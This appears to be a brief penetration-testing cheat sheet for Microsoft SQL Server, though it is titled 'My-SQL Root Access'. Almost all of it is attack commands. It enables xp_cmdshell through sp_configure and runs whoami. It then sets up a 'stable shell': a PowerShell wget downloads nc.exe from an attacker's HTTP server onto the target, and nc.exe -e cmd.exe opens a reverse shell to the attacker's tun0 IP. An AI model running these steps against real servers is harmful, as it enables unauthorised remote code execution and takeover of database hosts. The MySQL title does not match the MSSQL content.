My-SQL Root Access
----------------
After connecting :
Should we execute commands here:
>>>SELECT is_srvrolemember('sysadmin');
This will return us 1, which means true. So we can proceed -
>>>EXECUTE sp_configure 'show advanced options',1;
>>>RECONFIGURE;
>>>EXECUTE sp_configure 'xp_cmdshell',1;
>>>RECONFIGURE;
Now try running :
>>>xp_cmdshell "whoami"
-----------------
mssql stable shell:
>>>https://github.com/int0x33/nc.exe/blob/master/nc.exe → downloads this on kali
>>>python3 -m http.server → on kali
>>> xp_cmdshell "powershell.exe wget http://[Your_tun0_IP]:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe"
>>>nc -lvnp 4444 → on kali
>>>xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe [Your_tun0_IP] 4444"
----------------------------------------------------------------------------------------------------------------Last updated